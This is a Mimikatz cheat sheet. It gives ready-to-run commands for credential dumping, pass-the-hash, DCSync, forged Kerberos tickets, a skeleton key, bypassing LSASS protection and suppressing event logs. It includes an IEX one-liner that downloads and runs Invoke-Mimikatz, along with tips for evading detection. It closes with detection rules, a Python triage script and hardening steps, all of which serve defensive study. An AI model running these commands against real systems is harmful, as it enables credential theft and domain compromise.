
Mimikatz Cheat Sheet

Overview

Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.

⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.

Obtaining Mimikatz

Official Repository

Pre-compiled Binaries

  • mimikatz_trunk.zip / mimikatz_trunk.7z - release archives from the GitHub Releases page; each contains a Win32 and an x64 folder with mimikatz.exe, mimidrv.sys (the kernel driver) and mimilib.dll
  • Use the build that matches the target's architecture: 32-bit mimikatz cannot read a 64-bit LSASS, and sekurlsa::minidump likewise needs a dump of the same architecture

Compilation from Source

git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build

Basic Usage

Running Mimikatz

# Run directly (interactive console; start it from an elevated prompt)
mimikatz.exe

# Run from memory with PowerSploit's Invoke-Mimikatz: the script reflectively loads an
# embedded mimikatz build (often older than the current release, so it may fail on newer
# Windows builds); -DumpCreds is the default action and runs sekurlsa::logonpasswords
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Elevating Privileges

privilege::debug
# Requests SeDebugPrivilege for the mimikatz process; this is what lets sekurlsa::* open LSASS.
# It only succeeds from an elevated (administrator) context and reports: Privilege '20' OK

Getting Help

help
<module>::
<module>::<command> /?

Exiting Mimikatz

exit

Core Modules and Commands

sekurlsa Module (LSASS Memory Access)

Command Description
sekurlsa::logonpasswords Dump credentials of every logon session in LSASS: runs the msv, tspkg, wdigest, kerberos, ssp and credman providers in one pass
sekurlsa::tickets Extract Kerberos tickets (TGTs and service tickets) from all sessions; /export writes them as .kirbi files
sekurlsa::ekeys Extract Kerberos long-term keys (RC4/AES) per session, usable with sekurlsa::pth
sekurlsa::dpapi Extract DPAPI master keys cached in LSASS (decrypt user secrets without the password)
sekurlsa::credman Extract Credential Manager entries cached in LSASS
sekurlsa::msv Extract MSV1_0 (NTLM) data: LM/NT hashes and SHA1 of the password
sekurlsa::tspkg Extract TsPkg (Terminal Services SSO) data
sekurlsa::wdigest Extract WDigest data: plaintext passwords only when UseLogonCredential is 1
sekurlsa::kerberos Extract Kerberos package data: keys, and the plaintext password where the package still holds one
sekurlsa::ssp Extract SSP package credentials
sekurlsa::livessp Extract LiveSSP (Microsoft account) credentials
sekurlsa::cloudap Extract CloudAP data on Azure AD / Entra ID joined devices (Primary Refresh Token related material)

lsadump Module (SAM and Active Directory)

Command Description
lsadump::sam Dump local account LM/NT hashes from the SAM; needs SYSTEM (token::elevate) on a live host, or offline hives via /sam:SAM /system:SYSTEM
lsadump::secrets Dump LSA secrets from the registry (service account passwords, $MACHINE.ACC, DPAPI_SYSTEM); needs SYSTEM, or offline /security:SECURITY /system:SYSTEM
lsadump::cache Dump cached domain logon verifiers (MSCache v2 / DCC2); these must be cracked, they cannot be passed
lsadump::dcsync Impersonate a domain controller and pull password data over DRSUAPI replication; needs replication rights (Domain Admins or an equivalent ACE)
lsadump::lsa Dump account hashes through the LSASS process (/patch or /inject); on a DC this returns every domain account, filter with /name:USER or /id:RID
lsadump::trust Dump inter-domain trust keys (forging inter-realm tickets)
lsadump::backupkeys Retrieve the domain DPAPI backup key, which decrypts any domain user's DPAPI master keys; /export writes it to disk

kerberos Module (Ticket Manipulation)

Command Description
kerberos::list List Kerberos tickets of the current logon session (no privilege needed); /export writes .kirbi files
kerberos::purge Purge all tickets of the current logon session
kerberos::ptt Pass-the-ticket: inject a .kirbi file (or every file in a directory) into the current session
kerberos::golden Forge a ticket offline: a golden ticket (TGT) with the krbtgt key, or a silver ticket (service ticket) with the service account key when /target and /service are given
kerberos::silver Same command as kerberos::golden, used with /target and /service to forge a service ticket
kerberos::tgt Show the current session's TGT
kerberos::hash Compute Kerberos long-term keys (rc4_hmac_nt, aes128, aes256, des) from a password, user and domain

crypto Module (Cryptographic Operations)

Command Description
crypto::certificates List certificates in a store, and export them (/export) including keys marked non-exportable once the CAPI/CNG patches are applied
crypto::keys List private key containers (CAPI and CNG), with /export
crypto::system Describe a certificate from a file or the system store
crypto::capi Patch CryptoAPI in the current process so keys marked non-exportable can be exported
crypto::cng Patch the CNG key isolation service (KeyIso, inside LSASS) for the same effect; needs privilege::debug
crypto::stores List certificate stores

vault Module (Windows Vault Access)

Command Description
vault::cred Enumerate Credential Manager entries via CredEnumerate; /patch reveals the plaintext of entries that are not domain-cached
vault::list Enumerate Windows Vault contents (web and Windows credentials)

token Module (Token Manipulation)

Command Description
token::whoami Display the current identity (user, SID) and the token's privileges
token::list List the tokens of all processes; /user and /domainadmin filter the list
token::elevate Impersonate another process's token: NT AUTHORITY\SYSTEM by default, /domainadmin for the first domain admin token found, /id:TOKEN_ID for a specific one (run privilege::debug first)
token::revert Drop the impersonation and return to the original token
token::run Run a program under an impersonated token (/process:cmd.exe)

privilege Module (Privilege Management)

Command Description
privilege::debug Request SeDebugPrivilege (needed to open LSASS)
privilege::driver Request SeLoadDriverPrivilege

event Module (Event Log Management)

Command Description
event::clear Clear an event log (Security by default); clearing the Security log itself generates Event ID 1102, so this is noisy
event::drop Patch the Event Log service in memory so that new events are silently dropped (needs privilege::debug; does not survive a service restart)

ts Module (Terminal Services)

Command Description
ts::sessions List Terminal Services sessions (ID, user, state, client)
ts::multirdp Patch termsrv.dll in memory to allow multiple concurrent RDP sessions on client Windows editions

misc Module (Miscellaneous)

Command Description
misc::cmd Launch a command prompt with the current (possibly impersonated) token
misc::regedit Launch the Registry Editor with the current token
misc::taskmgr Launch Task Manager with the current token
misc::ncroutemon Patch Juniper Network Connect (route monitoring)
misc::detours Detect inline (Detours-style) hooks in the current process; a quick check for EDR user-mode hooking
misc::skeleton Patch LSASS on a domain controller so that a master password (default: mimikatz) is accepted for every account alongside the real one; in memory only, gone after a reboot

Common Attack Techniques

Credential Dumping

Extract Logon Passwords

privilege::debug
sekurlsa::logonpasswords

Extract Credentials from SAM

privilege::debug
token::elevate
lsadump::sam

Extract Cached Domain Credentials

privilege::debug
lsadump::cache

Extract from LSASS Dump

# Create the dump on the target with Task Manager (Details > lsass.exe > Create dump file),
# procdump.exe -accepteula -ma lsass.exe lsass.dmp, or any other MiniDumpWriteDump caller,
# then parse it in mimikatz of the same architecture (x64 dump into x64 mimikatz).
# No privilege is needed to parse the file itself.
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Pass-the-Hash Attacks

Pass-the-Hash with NTLM

# Starts a new process (default cmd.exe) whose logon session carries the supplied NT hash
# instead of a password; NTLM authentication from that process uses the hash directly, and
# Kerberos authentication requests an RC4-encrypted TGT with it. Needs privilege::debug.
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D

Pass-the-Key with AES Keys

# Same mechanism with a Kerberos AES key (from sekurlsa::ekeys or lsadump::dcsync): only
# Kerberos can use it, but the resulting TGT request is AES and does not stand out as RC4.
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF

Over-Pass-the-Hash (NTLM hash to Kerberos ticket)

# Identical to the first form: the RC4-HMAC Kerberos key is the NT hash, so any Kerberos
# authentication from the spawned process obtains real tickets for the user.
# /run names the program to spawn (default cmd.exe).
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe

DCSync Attack

Extract NTLM Hashes for All Users

# Needs replication rights on the domain (Domain Admins, Enterprise Admins, DC computer
# accounts, or a custom ACE granting DS-Replication-Get-Changes-All); /dc:DC_FQDN selects
# the DC to talk to, /csv reduces the output to user:rid:hash lines
lsadump::dcsync /domain:contoso.local /all /csv

Extract NTLM Hash for Specific User

lsadump::dcsync /domain:contoso.local /user:Administrator

Extract krbtgt Key Material (for Golden Ticket)

# Returns the NT hash and the AES keys of krbtgt; prefer the aes256 key when forging
lsadump::dcsync /domain:contoso.local /user:krbtgt

Kerberos Ticket Attacks

List Kerberos Tickets

kerberos::list

Create a Golden Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_NT_HASH /ticket:OUTPUT_FILE
# Defaults: /id:500 (RID), /groups:513,512,520,518,519, 10-year lifetime. Add /ptt to inject
# straight into the current session instead of writing a file, and /aes256:KEY in place of
# /krbtgt:HASH to avoid an RC4-encrypted TGT that stands out in an AES-only domain.
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi

Create a Silver Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER_FQDN /service:SPN_CLASS /rc4:SERVICE_ACCOUNT_NT_HASH /ticket:OUTPUT_FILE
# The key is the NT hash of the account the service runs as: usually the computer account
# (SERVER$) for cifs, host, rpcss or http on a member server, or the hash of a dedicated
# service account for SPNs registered to one. The ticket goes straight to the service, so
# the domain controller never sees it.
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi

Pass-the-Ticket

kerberos::ptt golden.kirbi

Purge Tickets

kerberos::purge

Skeleton Key Attack

# Run on a domain controller as a local administrator. Afterwards every domain account
# also accepts the password "mimikatz" (the real password keeps working). The patch lives
# in LSASS memory only, so a reboot removes it; LSA Protection blocks it.
privilege::debug
misc::skeleton

Advanced Techniques

DPAPI Master Key Extraction

sekurlsa::dpapi

LSA Protection (RunAsPPL) Bypass with mimidrv

# mimidrv.sys must be in the same directory as mimikatz.exe, and loading it needs
# administrator rights plus a kernel that accepts its signature (HVCI and the Microsoft
# vulnerable-driver blocklist can refuse it). This does not defeat Credential Guard,
# whose secrets live in an isolated process that no kernel driver can read.

# Enable debug privilege
privilege::debug

# Load the driver (creates and starts the "mimidrv" service)
!+

# Strip the protected-process flag from LSASS
!processprotect /process:lsass.exe /remove

# Extract credentials as usual
sekurlsa::logonpasswords

# Unload the driver
!-

Offline Analysis on Another Host

# Take the dump on the target, copy it off, and parse it elsewhere; only the dump step
# touches the target's LSASS, so this is what is usually done when mimikatz itself cannot
# run there. The analysis host must match the dump's architecture.
# Create process dump of LSASS using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Extract Credentials from Windows Credential Manager

vault::cred
vault::list

Extract Domain Backup Keys

# Needs Domain Admin rights on the DC; the exported .pvk decrypts any domain user's DPAPI
# master keys (dpapi::masterkey /pvk:...) without their password, and it is never rotated
lsadump::backupkeys /system:dc01.contoso.local /export

Command Examples with Parameters

sekurlsa::logonpasswords

sekurlsa::logonpasswords

sekurlsa::pth

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]

lsadump::dcsync

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/dc:DC_FQDN] [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv] [/dc:DC_FQDN]

kerberos::golden

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:NT_HASH [/id:USER_RID] [/groups:GROUP_RIDS] [/startoffset:MINUTES] [/endin:MINUTES] [/renewmax:MINUTES] [/ticket:OUTPUT_FILE | /ptt]
# /aes256:KEY or /aes128:KEY can replace /krbtgt:NT_HASH; /target and /service turn it into a silver ticket

kerberos::ptt

kerberos::ptt TICKET_FILE
# TICKET_FILE is a .kirbi file or a directory of them; check the result with kerberos::list

Defensive Measures

Detection Methods

  • LSASS access: Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe and a GrantedAccess that includes PROCESS_VM_READ (0x0010); mimikatz typically shows 0x1010, 0x1410 or 0x1438. Watch Sysmon Event ID 11 for lsass dump files written by Task Manager, procdump or comsvcs.dll MiniDump
  • The process name mimikatz.exe is a weak signal, since the binary is trivially renamed or recompiled; PowerShell Script Block Logging (Event ID 4104) still catches Invoke-Mimikatz by its embedded strings
  • DCSync: Security Event ID 4662 on a domain controller whose Properties field contains the replication rights DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) or DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) and whose subject is not a domain controller account; on the network, DRSUAPI (MS-DRSR) calls from non-DC addresses
  • Pass-the-hash: Security Event ID 4624 with LogonType 9 (NewCredentials), LogonProcessName seclogo and AuthenticationPackageName Negotiate (runas /netonly produces the same pattern, so baseline it)
  • Over-pass-the-hash and forged tickets: Event ID 4768 with TicketEncryptionType 0x17 (RC4) in an AES-capable domain; 4769 service-ticket requests with no preceding 4768 for the same account, or for accounts and SIDs that do not exist in AD (golden ticket); a silver ticket never reaches the DC, so look for the forged ticket's use on the service host itself
  • Privilege use: Event ID 4703 (token right adjusted) or 4673 showing SeDebugPrivilege on hosts and for accounts that have no reason to use it
  • Skeleton key and event::drop leave no event of their own; the LSASS access above on domain controllers (or on the event log service) is the indicator
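
As an added example, not part of the original page, here is the detection logic above expressed as code: a small Python triage that runs four behavioural rules over constructed sample events whose field names follow the Windows Security and Sysmon event XML. The event IDs, the PROCESS_VM_READ bit, the replication-right GUIDs, the seclogo logon process name and etype 0x17 are documented Windows values; the domain controller account names, the Defender allowlist entry and every sample event are assumptions made up for the example and would be replaced by the environment's own data.

```python
"""Triage Windows/Sysmon events for Mimikatz-style behaviour. Added example; constructed data."""
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, str]

PROCESS_VM_READ = 0x0010  # Sysmon EID 10 GrantedAccess bit every LSASS credential reader needs
REPLICATION_GUIDS = {     # extended rights seen in Security EID 4662 'Properties' during DCSync
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
ETYPE_RC4_HMAC = 0x17  # TicketEncryptionType in EID 4768

# Environment-specific tuning (assumed values for this example).
DOMAIN_CONTROLLER_ACCOUNTS = {"DC01$", "DC02$"}
LSASS_READ_ALLOWLIST = {r"C:\Program Files\Windows Defender\MsMpEng.exe"}


def check_lsass_access(e: Event) -> Optional[str]:
    """sekurlsa::* or a minidump: a process opened lsass.exe with PROCESS_VM_READ."""
    if e.get("EventID") != "10" or not e.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    access = int(e.get("GrantedAccess", "0"), 16)
    if not access & PROCESS_VM_READ:
        return None  # query-only handles (e.g. 0x1000) cannot read memory
    if e.get("SourceImage") in LSASS_READ_ALLOWLIST:
        return None
    return f"{e['SourceImage']} read LSASS memory (GrantedAccess=0x{access:x})"


def check_dcsync(e: Event) -> Optional[str]:
    """lsadump::dcsync: replication rights exercised by something that is not a DC."""
    if e.get("EventID") != "4662":
        return None
    props = e.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return None
    subject = e.get("SubjectUserName", "")
    if subject.upper() in DOMAIN_CONTROLLER_ACCOUNTS:
        return None  # DC-to-DC replication is normal
    return f"{subject} requested directory replication (DCSync)"


def check_pth_logon(e: Event) -> Optional[str]:
    """sekurlsa::pth: NewCredentials (type 9) logon through the 'seclogo' logon process."""
    if e.get("EventID") != "4624" or e.get("LogonType") != "9":
        return None
    if e.get("LogonProcessName", "").lower() != "seclogo":
        return None
    return f"NewCredentials logon for {e.get('TargetUserName')} via seclogo (pth or runas /netonly)"


def check_rc4_tgt(e: Event) -> Optional[str]:
    """Over-pass-the-hash with only an NT hash can only obtain an RC4 (0x17) TGT."""
    if e.get("EventID") != "4768":
        return None
    if int(e.get("TicketEncryptionType", "0x0"), 16) != ETYPE_RC4_HMAC:
        return None
    return f"RC4 TGT issued to {e.get('TargetUserName')} from {e.get('IpAddress')}"


CHECKS: List[Callable[[Event], Optional[str]]] = [
    check_lsass_access, check_dcsync, check_pth_logon, check_rc4_tgt,
]


def triage(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Return (event index, rule name, detail) for every event some rule matches."""
    hits: List[Tuple[int, str, str]] = []
    for i, e in enumerate(events):
        for check in CHECKS:
            detail = check(e)
            if detail:
                hits.append((i, check.__name__, detail))
    return hits


# Constructed sample events: one true positive and one benign case per rule.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "10", "SourceImage": r"C:\Users\alice\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "10", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": "4662", "SubjectUserName": "alice", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": "4662", "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": "4624", "LogonType": "9", "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "Administrator"},
    {"EventID": "4624", "LogonType": "2", "LogonProcessName": "User32",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "alice"},
    {"EventID": "4768", "TargetUserName": "Administrator", "IpAddress": "::ffff:10.0.0.25",
     "TicketEncryptionType": "0x17"},
    {"EventID": "4768", "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.31",
     "TicketEncryptionType": "0x12"},
]

if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] event #{idx}: {detail}")
```

The allowlist and the DC account set are the tuning points: the LSASS rule will fire on legitimate security products until their images are added, and the DCSync rule must know every DC (and any Azure AD Connect style account that legitimately replicates) or it will page on normal traffic.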

Prevention Methods

  • Enable LSA Protection (RunAsPPL): reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f (reboot required). This blocks user-mode reads of LSASS; a kernel driver such as mimidrv can still strip it unless HVCI or the vulnerable-driver blocklist stops the driver from loading
  • Enable Credential Guard (Windows 10 / Server 2016+, needs UEFI and virtualization-based security): NTLM hashes, Kerberos keys and TGTs are kept in the isolated LSAIso process, which neither sekurlsa nor a kernel driver can read, so sekurlsa::logonpasswords yields nothing usable for domain accounts
  • Put privileged accounts in the Protected Users group: no NTLM, no RC4 Kerberos, no cached credentials, no delegation and a 4-hour TGT lifetime, which defeats pass-the-hash and lsadump::cache for those accounts
  • Disable WDigest plaintext caching: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f (the default since Windows 8.1 / Server 2012 R2; older systems need KB2871997 first). Alert if the value is ever set back to 1, a common attacker move before dumping
  • Implement Just Enough Administration (JEA) and a tiered administration model so Domain Admin credentials never land in the LSASS of workstations or member servers
  • Restrict the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights to domain controllers, and audit any other principal holding them (that is exactly what DCSync needs)
  • Rotate passwords regularly, and after a suspected compromise reset the krbtgt password twice (allowing replication between resets) to invalidate golden tickets
  • Limit administrative privileges and local Administrators membership; use LAPS for local Administrator passwords so one dumped SAM hash does not open every host
  • Use long, unique passwords so dumped NT hashes and DCC2 values do not crack offline

Resources